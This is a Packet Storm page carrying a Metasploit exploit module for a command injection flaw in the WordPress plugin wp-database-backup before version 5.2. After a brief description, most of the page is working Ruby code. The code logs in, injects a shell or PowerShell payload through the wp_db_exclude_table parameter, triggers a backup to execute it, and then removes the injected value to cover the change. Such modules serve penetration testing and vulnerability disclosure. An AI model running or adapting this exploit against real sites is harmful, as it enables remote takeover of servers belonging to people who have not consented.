what you don't know can hurt you

WordPress Database Backup Remote Command Execution

WordPress Database Backup Remote Command Execution
Posted Jul 27, 2019
Authored by Shelby Pace, Mikey Veenstra | Site metasploit.com

There exists a command injection vulnerability in the Wordpress plugin wp-database-backup for versions less than 5.2. For the backup functionality, the plugin generates a mysqldump command to execute. The user can choose specific tables to exclude from the backup by setting the wp_db_exclude_table parameter in a POST request to the wp-database-backup page. The names of the excluded tables are included in the mysqldump command unsanitized. Arbitrary commands injected through the wp_db_exclude_table parameter are executed each time the functionality for creating a new database backup are run. Authentication is required to successfully exploit this vulnerability.

tags | exploit, arbitrary
MD5 | bf1a4442e1bd9d405a790a2876259f54

WordPress Database Backup Remote Command Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HTTP::Wordpress

def initialize(info = {})
super(update_info(info,
'Name' => 'WP Database Backup RCE',
'Description' => %q(
There exists a command injection vulnerability in the Wordpress plugin
`wp-database-backup` for versions < 5.2.

For the backup functionality, the plugin generates a `mysqldump` command
to execute. The user can choose specific tables to exclude from the backup
by setting the `wp_db_exclude_table` parameter in a POST request to the
`wp-database-backup` page. The names of the excluded tables are included in
the `mysqldump` command unsanitized. Arbitrary commands injected through the
`wp_db_exclude_table` parameter are executed each time the functionality
for creating a new database backup are run.

Authentication is required to successfully exploit this vulnerability.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Mikey Veenstra / Wordfence', # Vulnerability Discovery
'Shelby Pace' # Metasploit module
],
'References' =>
[
[ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],
],
'Platform' => [ 'win', 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' =>
[
[
'Windows',
{
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ]
}
],
[
'Linux',
{
'Platform' => 'linux',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'CmdStagerFlavor' => 'printf'
}
]
],
'DisclosureDate' => '2019-04-24',
'DefaultTarget' => 0
))

register_options(
[
OptString.new('USERNAME', [ true, 'Wordpress username', '' ]),
OptString.new('PASSWORD', [ true, 'Wordpress password', '' ]),
OptString.new('TARGETURI', [ true, 'Base path to Wordpress installation', '/' ])
])
end

def check
return CheckCode::Unknown unless wordpress_and_online?

changelog_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-database-backup', 'readme.txt')
res = send_request_cgi(
'method' => 'GET',
'uri' => changelog_uri
)

if res && res.code == 200
version = res.body.match(/=+\s(\d+\.\d+)\.?\d*\s=/)
return CheckCode::Detected unless version && version.length > 1

vprint_status("Version of wp-database-backup detected: #{version[1]}")
return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2')
end
CheckCode::Safe
end

def exploit
cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
fail_with(Failure::NoAccess, 'Unable to log into Wordpress') unless cookie

res = create_exclude_table(cookie)
nonce = get_nonce(res)
create_backup(cookie, nonce)

clear_exclude_table(cookie)
end

def create_exclude_table(cookie)
@exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => @exclude_uri,
'cookie' => cookie,
'vars_get' => { 'page' => 'wp-database-backup' }
)

fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200
print_good('Reached the wp-database-backup settings page')
if datastore['TARGET'] == 1
comm_payload = generate_cmdstager(concat_operator: ' && ', temp: './')
comm_payload = comm_payload.join('&&')
comm_payload = comm_payload.gsub('\'', '')
comm_payload = "; #{comm_payload} ;"
else
comm_payload = " & #{cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true, encode_final_payload: true)} & ::"
end

table_res = send_request_cgi(
'method' => 'POST',
'uri' => @exclude_uri,
'cookie' => cookie,
'vars_post' =>
{
'wpsetting' => 'Save',
'wp_db_exclude_table[wp_comment]' => comm_payload
}
)

fail_with(Failure::UnexpectedReply, 'Failed to submit payload as an excluded table') unless table_res && table_res.code
print_good('Successfully added payload as an excluded table')

res.get_html_document
end

def get_nonce(response)
fail_with(Failure::UnexpectedReply, 'Failed to get a proper response') unless response

div_res = response.at('p[@class="submit"]')
fail_with(Failure::NotFound, 'Failed to find the element containing the nonce') unless div_res

wpnonce = div_res.to_s.match(/_wpnonce=([0-9a-z]*)/)
fail_with(Failure::NotFound, 'Failed to retrieve the wpnonce') unless wpnonce && wpnonce.length > 1

wpnonce[1]
end

def create_backup(cookie, nonce)
first_res = send_request_cgi(
'method' => 'GET',
'uri' => @exclude_uri,
'cookie' => cookie,
'vars_get' =>
{
'page' => 'wp-database-backup',
'_wpnonce' => nonce,
'action' => 'createdbbackup'
}
)

res = send_request_cgi(
'method' => 'GET',
'uri' => @exclude_uri,
'cookie' => cookie,
'vars_get' =>
{
'page' => 'wp-database-backup',
'notification' => 'create'
}
)

fail_with(Failure::UnexpectedReply, 'Failed to create database backup') unless res && res.code == 200 && res.body.include?('Database Backup Created Successfully')
print_good('Successfully created a backup of the database')
end

def clear_exclude_table(cookie)
res = send_request_cgi(
'method' => 'POST',
'uri' => @exclude_uri,
'cookie' => cookie,
'vars_post' =>
{
'wpsetting' => 'Save',
'wp_db_exclude_table[wp_comment]' => 'wp_comment'
}
)

fail_with(Failure::UnexpectedReply, 'Failed to delete the remove the payload from the excluded tables') unless res && res.code == 200
print_good('Successfully deleted the payload from the excluded tables list')
end
end
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    35 Files
  • 8
    Jul 8th
    4 Files
  • 9
    Jul 9th
    9 Files
  • 10
    Jul 10th
    7 Files
  • 11
    Jul 11th
    4 Files
  • 12
    Jul 12th
    4 Files
  • 13
    Jul 13th
    14 Files
  • 14
    Jul 14th
    19 Files
  • 15
    Jul 15th
    8 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close